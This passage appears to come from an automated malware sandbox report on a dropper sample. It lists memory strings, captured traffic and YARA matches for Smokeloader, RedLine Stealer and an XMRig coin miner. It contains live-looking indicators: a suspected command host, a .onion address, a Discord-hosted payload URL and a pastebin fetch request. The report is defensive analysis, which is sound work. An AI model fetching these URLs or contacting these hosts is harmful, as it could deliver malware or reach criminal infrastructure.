                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: http://www.bloglines.com)Frame
                          Source: Broom.exe, 00000004.00000000.2106864524.0000000000401000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.broomcleaner.com/buyOpen
                          Source: file.exe, 00000000.00000002.2167858508.0000000006C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: http://www.everyfeed.com)explicit
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: http://www.exabot.com/go/robot)Opera/9.80
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: http://www.google.c
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: http://www.google.com/bot.html)Mozilla/5.0
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: http://www.google.com/bot.html)crypto/ecdh:
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: http://www.google.com/feedfetcher.html)HKLM
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: http://www.googlebot.com/bot.html)Links
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: http://www.spidersoft.com)
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: http://yandex.com/bots)Opera
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: http://yandex.com/bots)Opera/9.51
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0BA000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C09C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allstatsin.ru
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C11A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allstatsin.ruhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0F2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allstatsin.ruhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionS-1-5-21-2
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0BA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allstatsin.ruhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttps://al
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C09C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allstatsin.ruhttps://allstatsin.ruRegQueryValueExWhttps://allstatsin.ruUUIDUUIDPGDSE64-bitNe
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: https://blockchain.infoindex
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: https://blockstream.info/apiinva
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: https://cdn.discordapp.com/attachments/1088058556286251082/1111230812579450950/TsgVtmYNoFT.zipMozill
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: https://github.com/Snawoot/opera-proxy/releases/download/v1.2.2/opera-proxy.windows-386.exeBlackBerr
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsonsize
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)cannot
                          Source: unknownDNS traffic detected: queries for: host-file-host6.com
                          Source: global trafficHTTP traffic detected: GET /raw/cZ2J3Upi HTTP/1.1Accept: */*Connection: closeHost: pastebin.comUser-Agent: cpp-httplib/0.9
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 10 Nov 2023 14:37:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 31 0d 0a 5d 00 00 00 7b fa f2 1f b5 69 2b 38 4f e0 1a 9e dd a8 80 43 13 9c d0 5a 0f 7f 06 e0 b5 d6 fd e5 10 a9 1d d2 76 bf 53 5e da 04 ff e8 3d ef 26 5c 1f f2 fc d8 5a a3 06 9b 5d ca f9 6b dd 66 ab ec d1 5a 34 f9 e7 15 7a a0 fe ed 3d a3 87 ec 06 fc 31 c8 91 69 13 41 6b 5f 0f c5 f3 77 fd b7 4e cd a8 0d 0a 30 0d 0a 0d 0a Data Ascii: 61]{i+8OCZvS^=&\Z]kfZ4z=1iAk_wN0
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: OS X; U; en) Presto/2.6.30 Version/10.61facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)tls: internal error: handshake returned an error but is marked successfultls: received unexpected handshake message of type %T when waiting for %T equals www.facebook.com (Facebook)
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: o Debian/1.6-7Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)2695994666715063979466701508701962594045780771442439172168272236806126959946667150639794667015087019630673557916 equals www.facebook.com (Facebook)
                          Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ocyugmcp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: host-host-file8.com

                          Key, Mouse, Clipboard, Microphone and Screen Capturing

                          barindex
                          Source: Yara matchFile source: 57.2.cdttvvc.a515a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 9.2.toolspub2.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.toolspub2.exe.8315a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 59.2.cdttvvc.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000003B.00000002.2612282713.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000002.2281261302.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000002.2281176476.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000003B.00000002.2612331641.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exeCode function: 2_2_0040571B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,2_2_0040571B

                          E-Banking Fraud

                          barindex
                          Source: Yara matchFile source: 5.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.2f70e67.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.2f10e67.14.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.3.e0cbefcb1af40c7d4aff4aca26621a98.exe.3800000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.3.e0cbefcb1af40c7d4aff4aca26621a98.exe.3860000.7.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000003.2270531809.0000000003C42000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000002.4560534739.0000000000843000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000002.4575750686.0000000003353000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: e0cbefcb1af40c7d4aff4aca26621a98.exe PID: 3392, type: MEMORYSTR

                          Spam, unwanted Advertisements and Ransom Demands

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\latestX.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                          Operating System Destruction

                          barindex
                          Source: C:\Program Files\Google\Chrome\updater.exeProcess information set: 01 00 00 00
                          Source: C:\Program Files\Google\Chrome\updater.exeProcess information set: 01 00 00 00

                          System Summary

                          barindex
                          Source: file.exe, type: SAMPLEMatched rule: Detects downloader / injector Author: ditekSHen
                          Source: 39.2.updater.exe.7ff7fa9d7e20.1.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: 39.2.updater.exe.7ff7fa9d7e20.1.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 39.2.updater.exe.7ff7fa9d7e20.1.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 39.2.updater.exe.7ff7fa990000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: 39.2.updater.exe.7ff7fa990000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 39.2.updater.exe.7ff7fa990000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 39.2.updater.exe.7ff7fa9d4540.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: 39.2.updater.exe.7ff7fa9d4540.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 39.2.updater.exe.7ff7fa9d4540.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 39.2.updater.exe.7ff7fa9d7e20.1.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: 39.2.updater.exe.7ff7fa9d7e20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 39.2.updater.exe.7ff7fa9d7e20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 0000003B.00000002.2612282713.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                          Source: 00000011.00000002.4575750686.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                          Source: 00000005.00000002.4576083277.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                          Source: 00000011.00000002.4575377290.0000000002B16000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                          Source: 00000009.00000002.2281261302.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                          Source: 00000003.00000002.2155575698.0000000000952000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                          Source: 00000027.00000002.2684843852.00007FF7FA9B0000.00000004.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: 00000039.00000002.2540236474.0000000000A82000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                          Source: 00000009.00000002.2281176476.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                          Source: 0000003B.00000002.2612331641.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                          Source: 00000005.00000002.4575660571.0000000002B6B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                          Source: C:\Windows\Temp\whxcdqscjswq.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: C:\Windows\Temp\whxcdqscjswq.tmp, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: C:\Windows\Temp\whxcdqscjswq.tmp, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                          Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exeCode function: 2_2_00406DC62_2_00406DC6
                          Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exeCode function: 2_2_0040759D2_2_0040759D
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_004174DA3_2_004174DA
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_004111D53_2_004111D5
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_004101E83_2_004101E8
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_00410DED3_2_00410DED
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_0041067D3_2_0041067D
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_00410A1B3_2_00410A1B
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_004156243_2_00415624
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_00415B753_2_00415B75
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_004167A23_2_004167A2
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFD348948FA26_2_00007FFD348948FA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFD3489918526_2_00007FFD34899185
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFD348952FA26_2_00007FFD348952FA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFD3489D26726_2_00007FFD3489D267
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFD3489A7C826_2_00007FFD3489A7C8
                          Source: C:\Windows\System32\conhost.exeCode function: 60_2_00007FF6EB4485E060_2_00007FF6EB4485E0
                          Source: C:\Windows\System32\conhost.exeCode function: 60_2_00007FF6EB4371B060_2_00007FF6EB4371B0
                          Source: C:\Windows\System32\conhost.exeCode function: 60_2_00007FF6EB446DA060_2_00007FF6EB446DA0
                          Source: C:\Windows\System32\conhost.exeCode function: 60_2_00007FF6EB443E0060_2_00007FF6EB443E00
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 64_2_00007FFD3489CA1564_2_00007FFD3489CA15
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 64_2_00007FFD3489CE8564_2_00007FFD3489CE85
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 64_2_00007FFD348991FA64_2_00007FFD348991FA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 64_2_00007FFD348949CD64_2_00007FFD348949CD
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 64_2_00007FFD348992FA64_2_00007FFD348992FA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 64_2_00007FFD348952FA64_2_00007FFD348952FA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 64_2_00007FFD3489B7D364_2_00007FFD3489B7D3
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 64_2_00007FFD3489A7C864_2_00007FFD3489A7C8
                          Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                          Source: C:\Windows\explorer.exeSection loaded: webio.dll
                          Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dll
                          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dll
                          Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dll
                          Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Program Files\Google\Libs\WR64.sys
                          Source: updater.exe.6.drStatic PE information: Number of sections : 11 > 10
                          Source: latestX.exe.0.drStatic PE information: Number of sections : 11 > 10
                          Source: Broom.exe.2.drStatic PE information: Number of sections : 11 > 10
                          Source: Joe Sandbox ViewDropped File: C:\Program Files\Google\Chrome\updater.exe F91E4FF7811A5848561463D970C51870C9299A80117A89FB86A698B9F727DE87
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: file.exe, type: SAMPLEMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                          Source: 39.2.updater.exe.7ff7fa9d7e20.1.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: 39.2.updater.exe.7ff7fa9d7e20.1.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 39.2.updater.exe.7ff7fa9d7e20.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 39.2.updater.exe.7ff7fa990000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: 39.2.updater.exe.7ff7fa990000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 39.2.updater.exe.7ff7fa990000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 39.2.updater.exe.7ff7fa9d4540.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: 39.2.updater.exe.7ff7fa9d4540.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 39.2.updater.exe.7ff7fa9d4540.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 39.2.updater.exe.7ff7fa9d7e20.1.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: 39.2.updater.exe.7ff7fa9d7e20.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 39.2.updater.exe.7ff7fa9d7e20.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 0000003B.00000002.2612282713.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                          Source: 00000011.00000002.4575750686.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                          Source: 00000005.00000002.4576083277.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                          Source: 00000011.00000002.4575377290.0000000002B16000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                          Source: 00000009.00000002.2281261302.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                          Source: 00000003.00000002.2155575698.0000000000952000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                          Source: 00000027.00000002.2684843852.00007FF7FA9B0000.00000004.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: 00000039.00000002.2540236474.0000000000A82000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                          Source: 00000009.00000002.2281176476.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
